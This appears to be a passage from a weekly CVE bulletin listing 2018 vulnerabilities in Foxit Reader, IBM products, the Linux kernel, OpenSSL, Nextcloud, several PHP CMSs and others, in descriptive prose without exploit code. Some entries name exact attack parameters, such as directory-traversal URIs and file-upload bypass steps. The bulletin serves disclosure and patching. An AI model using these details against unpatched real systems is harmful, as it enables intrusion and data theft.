      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit PhantomPDF Phantom PDF 9.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within fxhtml2pdf. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-6230.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17706 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.1.0.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of OCG objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6435.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17624 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of onFocus events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6335.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17617 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Calculate events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6353.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17620 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Validate events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6352.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17619 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of onBlur events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6334.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17616 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Selection Change events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6336.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17618 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Format events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6355.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17621 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.1.0.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Calculate events. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6354.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17622 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Link objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6434.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17623 | Sources: CONFIRM, MISC

    foxit -- reader
      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Mouse Exit events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6333.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17615 | Sources: CONFIRM, MISC

    fr.sauter_ag -- case_suite
     
    An XXE vulnerability exists in CASE Suite Versions 3.10 and prior when processing parameter entities, which may allow remote file disclosure.2018-11-02not yet calculatedCVE-2018-17912
    MISC
    gnu -- binutilsAn issue was discovered in cp-demangle.c in GNU libiberty, as distributed in GNU Binutils 2.31. There is a stack consumption vulnerability resulting from infinite recursion in the functions next_is_type_qual() and cplus_demangle_type() in cp-demangle.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via an ELF file, as demonstrated by nm.2018-10-29not yet calculatedCVE-2018-18701
    MISC
    gnu -- binutilsAn issue was discovered in cp-demangle.c in GNU libiberty, as distributed in GNU Binutils 2.31. There is a stack consumption vulnerability resulting from infinite recursion in the functions d_name(), d_encoding(), and d_local_name() in cp-demangle.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via an ELF file, as demonstrated by nm.2018-10-29not yet calculatedCVE-2018-18700
    MISC
    gnu -- gettext
     
    An issue was discovered in GNU gettext 0.19.8. There is a double free in default_add_message in read-catalog.c, related to an invalid free in po_gram_parse in po-gram-gen.y, as demonstrated by lt-msgfmt.2018-10-29not yet calculatedCVE-2018-18751
    MISC
    MISC
    gopro -- gpmf-parser
     
    An issue was discovered in GoPro gpmf-parser 1.2.1. There is an out-of-bounds write in OpenMP4Source in GPMF_mp4reader.c. 2018-10-29not yet calculatedCVE-2018-18699
    MISC
    grapixel -- new_mediaGrapixel New Media v2.0 allows SQL Injection via the pages.aspx pageref parameter.2018-10-30not yet calculatedCVE-2018-18822
    EXPLOIT-DB
    green_electronics -- rainmachine_mini-8A Cross Site Request Forgery (CSRF) vulnerability in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allows an attacker to control the RainMachine device via the REST API.2018-11-01not yet calculatedCVE-2018-6907
    MISC
    green_electronics -- rainmachine_mini-8The time-based one-time-password (TOTP) function in the application logic of the Green Electronics RainMachine Mini-8 (2nd generation) uses the administrator's password hash to generate a 6-digit temporary passcode that can be used for remote and local access, aka a "Use of Password Hash Instead of Password for Authentication" issue. This is exploitable by an attacker who discovers a hash value in the rainmachine-settings.sqlite file.2018-11-01not yet calculatedCVE-2018-6011
    MISC
    green_electronics -- rainmachine_mini-8An authentication bypass vulnerability exists in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allowing an unauthenticated attacker to perform authenticated actions on the device via a 127.0.0.1:port value in the HTTP 'Host' header, as demonstrated by retrieving credentials.2018-11-01not yet calculatedCVE-2018-6908
    MISC
    green_electronics -- rainmachine_mini-8A missing X-Frame-Options header in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application could be used by a remote attacker for clickjacking, as demonstrated by triggering an API page request.2018-11-01not yet calculatedCVE-2018-6909
    MISC
    green_electronics -- rainmachine_mini-8A persistent Cross Site Scripting (XSS) vulnerability in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allows an attacker to inject arbitrary JavaScript via the REST API.2018-11-01not yet calculatedCVE-2018-6906
    MISC
    green_electronics -- rainmachine_mini-8
     
    The 'Weather Service' feature of the Green Electronics RainMachine Mini-8 (2nd generation) allows an attacker to inject arbitrary Python code via the 'Add new weather data source' upload function.2018-11-01not yet calculatedCVE-2018-6012
    MISC
    gthumb -- gthumb
     
    An issue was discovered in gThumb through 3.6.2. There is a double-free vulnerability in the add_themes_from_dir method in dlg-contact-sheet.c because of two successive calls of g_free, each of which frees the same buffer.2018-10-29not yet calculatedCVE-2018-18718
    MISC
    ibm -- daeja_viewone
     
    IBM Daeja ViewONE Professional, Standard & Virtual 5 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150514.2018-11-02not yet calculatedCVE-2018-1835
    CONFIRM
    XF
    ibm -- infosphere_master_data_management_collaboration_serverIBM InfoSphere Master Data Management Collaboration Server 11.4, 11.5, and 11.6 could allow an authenticated user with CA level access to change change their ca-id to another users and read sensitive information. IBM X-Force ID: 138077.2018-10-29not yet calculatedCVE-2018-1380
    XF
    CONFIRM
    ibm -- quality_manager
     
    IBM Quality Manager (RQM) 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132929.2018-11-02not yet calculatedCVE-2017-1609
    CONFIRM
    XF
    ibm -- rational_engineering_lifecycle_manager
     
    IBM Rational Engineering Lifecycle Manager 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150945.2018-11-02not yet calculatedCVE-2018-1846
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 11 could under certain cases, display the password in a Control Room log file after installation. IBM X-Force ID: 151707.2018-11-02not yet calculatedCVE-2018-1876
    XF
    CONFIRM
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 11 could store highly sensitive information in the form of unencrypted passwords that would be available to a local user. IBM X-Force ID: 151713.2018-11-02not yet calculatedCVE-2018-1877
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 10.0 and 11.0 allows a remote attacker to execute arbitrary code on the system, caused by a missing restriction in which file types can be uploaded to the control room. By uploading a malicious file and tricking a victim to run it, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 142889.2018-11-02not yet calculatedCVE-2018-1552
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhere
     
    IBM Robotic Process Automation with Automation Anywhere 11 could disclose sensitive information in a web request that could aid in future attacks against the system. IBM X-Force ID: 151714.2018-11-02not yet calculatedCVE-2018-1878
    XF
    CONFIRM
    ibm -- spectrum_protect_server
     
    IBM Spectrum Protect Server 7.1 and 8.1 could disclose highly sensitive information via trace logs to a local privileged user. IBM X-Force ID: 148873.2018-11-02not yet calculatedCVE-2018-1788
    CONFIRM
    XF
    ibm -- team_concert
     
    IBM Team Concert (RTC) 5.0 through 5.0.2 and 6.0 through 6.0.5 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148620.2018-10-29not yet calculatedCVE-2018-1766
    CONFIRM
    XF
    ibm -- websphere_application_serverIBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Cachemonitor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148621.2018-10-29not yet calculatedCVE-2018-1767
    SECTRACK
    XF
    CONFIRM
    ibm -- websphere_application_server_liberty_openid_connect
     
    IBM WebSphere Application Server Liberty OpenID Connect could allow a remote attacker to execute arbitrary code on the system, caused by improper deserialization. By sending a specially-crafted request to the RP service, an attacker could exploit this vulnerability to execute arbitrary code. IBM X-Force ID: 150999.2018-10-31not yet calculatedCVE-2018-1851
    XF
    CONFIRM
    icms -- icms
     
    spider.admincp.php in iCMS v7.0.11 allows SQL injection via admincp.php?app=spider&do=import_rule because the upfile content is base64 decoded, deserialized, and used for database insertion.2018-10-29not yet calculatedCVE-2018-18702
    MISC
    indusoft -- web_studioInduSoft Web Studio versions prior to 8.1 SP2, and InTouch Edge HMI (formerly InTouch Machine Edition) versions prior to 2017 SP2. A remote attacker could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. If InduSoft Web Studio remote communication security was not enabled, or a password was left blank, a remote user could send a carefully crafted packet to invoke an arbitrary process, with potential for code to be executed. The code would be executed under the privileges of the InduSoft Web Studio or InTouch Edge HMI runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Edge HMI server machine.2018-11-02not yet calculatedCVE-2018-17916
    MISC
    MISC
    indusoft -- web_studio
     
    InduSoft Web Studio versions prior to 8.1 SP2, and InTouch Edge HMI (formerly InTouch Machine Edition) versions prior to 2017 SP2. This vulnerability could allow an unauthenticated user to remotely execute code with the same privileges as that of the InduSoft Web Studio or InTouch Edge HMI (formerly InTouch Machine Edition) runtime.2018-11-02not yet calculatedCVE-2018-17914
    MISC
    MISC
    interactive_advertising_bureau -- openrtb
     
    The Interactive Advertising Bureau (IAB) OpenRTB 2.3 protocol implementation might allow remote attackers to conceal the status of ad transactions and potentially compromise bid integrity by leveraging failure to limit the time between bid responses and impression notifications, aka the Amnesia Bug.2018-10-30not yet calculatedCVE-2015-7266
    MISC
    iobit -- malware_fighter
     
    RegFilter.sys in IOBit Malware Fighter 6.2 and earlier is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E010. This can lead to denial of service (DoS) or code execution with root privileges.2018-11-01not yet calculatedCVE-2018-18714
    MISC
    jasper -- jasper
     
    An issue was discovered in JasPer 2.0.14. There is a NULL pointer dereference in the function ras_putdatastd in ras/ras_enc.c.2018-10-31not yet calculatedCVE-2018-18873
    MISC
    jboss -- bpm_suite
     
    JBoss BPM Suite 6 is vulnerable to a reflected XSS via dashbuilder. Remote attackers can entice authenticated users that have privileges to access dashbuilder (usually admins) to click on links to /dashbuilder/Controller containing malicious scripts. Successful exploitation would allow execution of script code within the context of the affected user.2018-10-31not yet calculatedCVE-2016-6343
    REDHAT
    BID
    REDHAT
    CONFIRM
    laravelcms -- laravelcms 
     
    An issue was discovered in laravelCMS through 2018-04-02. \app\Http\Controllers\Backend\ProfileController.php allows upload of arbitrary PHP files because the file extension is not properly checked and uploaded files are not properly renamed.2018-10-31not yet calculatedCVE-2018-18888
    MISC
    leostream -- agentThe Leostream Agent before Build 7.0.1.0 when used with Leostream Connection Broker 8.2.72 or earlier allows remote attackers to modify registry keys via the Leostream Agent API.2018-10-29not yet calculatedCVE-2018-18817
    MISC
    libav -- libavThere exists a NULL pointer dereference in ff_vc1_parse_frame_header_adv in vc1.c in Libav 12.3, which allows attackers to cause a denial-of-service through a crafted aac file.2018-10-30not yet calculatedCVE-2018-18829
    MISC
    libav -- libavThere exists a heap-based buffer overflow in vc1_decode_i_block_adv in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18828
    MISC
    libav -- libav
     
    There exists a heap-based buffer over-read in ff_vc1_pred_dc in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18827
    MISC
    libav -- libav
     
    There exists a heap-based buffer overflow in vc1_decode_p_mb_intfi in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18826
    MISC
    libexif -- libexif
     
    A vulnerability was found in libexif. An integer overflow when parsing the MNOTE entry data of the input file. This can cause Denial-of-Service (DoS) and Information Disclosure (disclosing some critical heap chunk metadata, even other applications' private data).2018-10-31not yet calculatedCVE-2016-6328
    CONFIRM
    libiec61850 -- libiec61850
     
    An issue has been found in libIEC61850 v1.3. It is a heap-based buffer overflow in BerEncoder_encodeOctetString in mms/asn1/ber_encoder.c.2018-10-30not yet calculatedCVE-2018-18834
    MISC
    MISC
    libnmapp -- libnmapp
     
    A command injection vulnerability in libnmapp package for versions <0.4.16 allows arbitrary commands to be executed via arguments to the range options.2018-10-30not yet calculatedCVE-2018-16461
    MISC
    libsdl -- sdl_image
     
    An exploitable code execution vulnerability exists in the XCF image rendering functionality of SDL2_image-2.0.3. A specially crafted XCF image can cause a heap overflow, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability.2018-11-01not yet calculatedCVE-2018-3977
    MISC
    libtiff -- libtiff
     
    An issue was discovered in LibTIFF 4.0.9. There is a NULL pointer dereference in the function LZWDecode in the file tif_lzw.c.2018-10-26not yet calculatedCVE-2018-18661
    MISC
    BID
    linux -- kernelSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused. This is fixed in the following kernel versions: 4.9.135, 4.14.78, 4.18.16, 4.19.2018-10-30not yet calculatedCVE-2018-18281
    MISC
    MLIST
    BID
    MISC
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    linux -- kernelIn the Linux kernel before 4.17, a local attacker able to set attributes on an xfs filesystem could make this filesystem non-operational until the next mount by triggering an unchecked error condition during an xfs attribute change, because xfs_attr_shortform_addname in fs/xfs/libxfs/xfs_attr.c mishandles ATTR_REPLACE operations with conversion of an attr from short to long form.2018-10-26not yet calculatedCVE-2018-18690
    MISC
    BID
    MISC
    MISC
    MISC
    linux -- kernelAn issue was discovered in the Linux kernel through 4.19. An information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c could be used by local attackers to read kernel memory because a cast from unsigned long to int interferes with bounds checking. This is similar to CVE-2018-10940 and CVE-2018-16658.2018-10-29not yet calculatedCVE-2018-18710
    MISC
    MISC
    linux -- kernel
     
    The Linux kernel, as used in Ubuntu 18.04 LTS and Ubuntu 18.10, allows local users to obtain names of files in which they would not normally be able to access via an overlayfs mount inside of a user namespace.2018-10-26not yet calculatedCVE-2018-6559
    BID
    CONFIRM
    CONFIRM
    CONFIRM
    lulu -- cms
     
    An issue was discovered in LuLu CMS through 2015-05-14. backend\modules\filemanager\controllers\DefaultController.php allows arbitrary file upload by entering a filename, directory name, and PHP code into the three text input fields.2018-10-29not yet calculatedCVE-2018-18771
    MISC
    m2soft -- report_designer_viewer
     
    M2SOFT Report Designer Viewer 5.0 allows a Buffer Overflow with Extended Instruction Pointer (EIP) control via a crafted MRD file.2018-11-01not yet calculatedCVE-2018-18695
    MISC
    mantisbt -- mantisbtA cross-site scripting (XSS) vulnerability in the Edit Filter page (manage_filter_edit page.php) in MantisBT 2.1.0 through 2.17.1 allows remote attackers (if access rights permit it) to inject arbitrary code (if CSP settings permit it) through a crafted project name.2018-10-30not yet calculatedCVE-2018-17783
    CONFIRM
    CONFIRM
    mantisbt -- mantisbt
     
    A cross-site scripting (XSS) vulnerability in the Manage Filters page (manage_filter_page.php) in MantisBT 2.1.0 through 2.17.1 allows remote attackers (if access rights permit it) to inject arbitrary code (if CSP settings permit it) through a crafted project name.2018-10-30not yet calculatedCVE-2018-17782
    CONFIRM
    CONFIRM
    mcms -- mcms
     
    An issue was discovered in com\mingsoft\basic\action\web\FileAction.java in MCMS 4.6.5. Since the upload interface does not verify the user login status, you can use this interface to upload files without setting a cookie. First, start an upload of JSP code with a .png filename, and then intercept the data packet. In the name parameter, change the suffix to jsp. In the response, the server returns the storage path of the file, which can be accessed to execute arbitrary JSP code.2018-10-30not yet calculatedCVE-2018-18830
    MISC
    merge_package -- merge_package
     
    The merge.recursive function in the merge package v <1.2 can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects allowing for a denial of service attack.2018-10-30not yet calculatedCVE-2018-16469
    MISC
    microstrategy -- webDirectory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18777
    MISC
    EXPLOIT-DB
    microstrategy -- webMicrostrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the admin/admin.asp ShowAll parameter. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18776
    MISC
    EXPLOIT-DB
    microstrategy -- web
     
    Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18775
    MISC
    EXPLOIT-DB
    mingsoft -- mcms
     
    An issue was discovered in com\mingsoft\cms\action\GeneraterAction.java in MCMS 4.6.5. An attacker can write a .jsp file (in the position parameter) to an arbitrary directory via a ../ Directory Traversal in the url parameter.2018-10-30not yet calculatedCVE-2018-18831
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows execution of arbitrary PHP code via the install.php sitename parameter, which affects the site_name field in mc_conf.php.2018-10-31not yet calculatedCVE-2018-18892
    MISC
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows full path disclosure via /mc-admin/post.php?state=delete&delete= with an invalid filename.2018-10-31not yet calculatedCVE-2018-18890
    MISC
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows file deletion via /mc-admin/post.php?state=delete&delete= because the authentication check occurs too late.2018-10-31not yet calculatedCVE-2018-18891
    MISC
    MISC
    monstra -- cms
     
    admin/index.php?id=filesmanager in Monstra CMS 3.0.4 allows remote authenticated administrators to trigger stored XSS via JavaScript content in a file whose name lacks an extension. Such a file is interpreted as text/html in certain cases.2018-10-29not yet calculatedCVE-2018-18694
    MISC
    nc-cms -- nc-cms
     
    nc-cms through 2017-03-10 allows remote attackers to execute arbitrary PHP code via the "Upload File or Image" feature, with a .php filename and "Content-Type: application/octet-stream" to the index.php?action=file_manager_upload URI.2018-10-31not yet calculatedCVE-2018-18874
    MISC
    netgain -- enterprise_managerNetGain Enterprise Manager (EM) is affected by OS Command Injection vulnerabilities in versions before 10.0.57. These vulnerabilities could allow remote authenticated attackers to inject arbitrary code, resulting in remote code execution.2018-11-01not yet calculatedCVE-2018-10587
    MISC
    netgain -- enterprise_manager
     
    NetGain Enterprise Manager (EM) is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities in versions before 10.1.12.2018-11-01not yet calculatedCVE-2018-10586
    MISC
    nextcloud -- serverA missing access check in Nextcloud Server prior to 14.0.0 could lead to continued access to password protected link shares when the owner had changed the password.2018-10-30not yet calculatedCVE-2018-16464
    MISC
    MISC
    nextcloud -- serverMissing state in Nextcloud Server prior to 14.0.0 would not enforce the use of a second factor at login if the the provider of the second factor failed to load.2018-10-30not yet calculatedCVE-2018-16465
    MISC
    MISC
    nextcloud -- serverA missing check in Nextcloud Server prior to 14.0.0 could give unauthorized access to the previews of single file password protected shares.2018-10-30not yet calculatedCVE-2018-16467
    MISC
    MISC
    nextcloud -- serverImproper revalidation of permissions in Nextcloud Server prior to 14.0.0, 13.0.6 and 12.0.11 lead to not accepting access restrictions by acess tokens.2018-10-30not yet calculatedCVE-2018-16466
    MISC
    MISC
    nextcloud -- server
     
    A bug causing session fixation in Nextcloud Server prior to 14.0.0, 13.0.3 and 12.0.8 could potentially allow an attacker to obtain access to password protected shares.2018-10-30not yet calculatedCVE-2018-16463
    MISC
    MISC
    no-cms -- no-cms
     
    No-CMS 1.1.3 is prone to Persistent XSS via a contact_us name parameter, as demonstrated by the VG48Z5PqVWname parameter.2018-10-31not yet calculatedCVE-2018-18868
    MISC
    octopus -- deploy
     
    In Octopus Deploy 2018.8.0 through 2018.9.x before 2018.9.1, an authenticated user with permission to modify deployment processes could upload a maliciously crafted YAML configuration, potentially allowing for remote execution of arbitrary code, running in the same context as the Octopus Server (for self-hosted installations by default, SYSTEM).2018-10-30not yet calculatedCVE-2018-18850
    MISC
    openssl -- dsa
     
    The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a-dev (Affected 1.1.1). Fixed in OpenSSL 1.1.0j-dev (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q-dev (Affected 1.0.2-1.0.2p).2018-10-30not yet calculatedCVE-2018-0734
    BID
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    openssl -- ecdsa
     
    The OpenSSL ECDSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.0j-dev (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.1.1a-dev (Affected 1.1.1).2018-10-29not yet calculatedCVE-2018-0735
    BID
    SECTRACK
    CONFIRM
    CONFIRM
    CONFIRM
    openstack-mistral -- openstack-mistral
     
    A flaw was found in openstack-mistral. By manipulating the SSH private key filename, the std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action. Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.2018-11-02not yet calculatedCVE-2018-16849
    CONFIRM
    CONFIRM
    pagoda -- linux_panel
     
    Pagoda Linux panel V6.0 has XSS via the verification code associated with an invalid account login. A crafted code is mishandled during rendering of the login log.2018-10-30not yet calculatedCVE-2018-18825
    MISC
    phptpoint -- hospital_management_system
     
    PhpTpoint hospital management system suffers from multiple SQL injection vulnerabilities via the index.php user parameter associated with LOGIN.php, or the rno parameter to ALIST.php, DUNDEL.php, PDEL.php, or PUNDEL.php.2018-10-29not yet calculatedCVE-2018-18705
    MISC
    phptpoint -- mailing_server_using_file_handling
     
    PhpTpoint Mailing Server Using File Handling 1.0 suffers from multiple Arbitrary File Read vulnerabilities in different sections that allow an attacker to read sensitive files on the system via directory traversal, bypassing the login page, as demonstrated by the Mailserver_filesystem/home.php coninb, consent, contrsh, condrft, or conspam parameter.2018-10-29not yet calculatedCVE-2018-18703
    MISC
    phptpoint -- pharmacy_management_system
     
    PhpTpoint Pharmacy Management System suffers from a SQL injection vulnerability in the index.php username parameter.2018-10-29not yet calculatedCVE-2018-18704
    EXPLOIT-DB
    phpyun -- phpyum
     
    The function down_sql_action() in /admin/model/database.class.php in PHPYun 4.6 allows remote attackers to read arbitrary files via directory traversal in an m=database&c=down_sql&name=../ URI.2018-10-29not yet calculatedCVE-2018-18713
    MISC
    MISC
    pivotal -- operations_manager
     
    Pivotal Operations Manager, versions 2.0.x prior to 2.0.24, versions 2.1.x prior to 2.1.15, versions 2.2.x prior to 2.2.7, and versions 2.3.x prior to 2.3.1, grants all users a scope which allows for privilege escalation. A remote malicious user who has been authenticated may create a new client with administrator privileges for Opsman.2018-11-02not yet calculatedCVE-2018-15762
    CONFIRM
    playsms -- playsms
     
    playSMS through 1.4.2 allows Privilege Escalation through Daemon abuse.2018-10-29not yet calculatedCVE-2018-18387
    MISC
    poppler -- poppler
     
    An issue was discovered in Poppler 0.71.0. There is a memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc, as demonstrated by pdftocairo.2018-11-02not yet calculatedCVE-2018-18897
    MISC
    powerdns -- authoritative_server
     
    An issue has been found in PowerDNS Authoritative Server versions up to and including 3.4.10, 4.0.1 allowing an authorized user to crash the server by inserting a specially crafted record in a zone under their control then sending a DNS query for that record. The issue is due to an integer overflow when checking if the content of the record matches the expected size, allowing an attacker to cause a read past the buffer boundary.2018-11-01not yet calculatedCVE-2016-2120
    CONFIRM
    DEBIAN
    projectsend -- r582
        ProjectSend (formerly cFTP) r582 allows authentication bypass via a direct request for users.php, home.php, edit-file.php?file_id=1, or process-zip-download.php, or via add_user_form_* parameters to users-add.php.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2016-10732 | Source: MISC

    projectsend -- r582
        ProjectSend (formerly cFTP) r582 allows directory traversal via file=../ in the process-zip-download.php query string.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2016-10733 | Source: MISC

    projectsend -- r582
        ProjectSend (formerly cFTP) r582 allows Insecure Direct Object Reference via includes/actions.log.export.php.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2016-10734 | Source: MISC

    projectsend -- r582
        ProjectSend (formerly cFTP) r582 allows SQL injection via the status or files parameter of manage-files.php, the selected_clients or status parameter of clients.php, the file parameter of process-zip-download.php, or the action parameter of home-log.php.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2016-10731 | Source: MISC

    python-kdcproxy -- python-kdcproxy
        python-kdcproxy before 0.3.2 allows remote attackers to cause a denial of service via a large POST request.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2015-5159 | Sources: CONFIRM, CONFIRM

    qemu -- qemu
        An out-of-bounds heap buffer read/write issue was found in the NVM Express Controller emulation in QEMU. It can occur in the nvme_cmb_ops routines of the nvme device. A guest user or process could use this flaw to crash the QEMU process, resulting in DoS, or potentially run arbitrary code with the privileges of the QEMU process.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-16847 | Sources: CONFIRM, MISC, MLIST

    qualcomm -- snapdragon
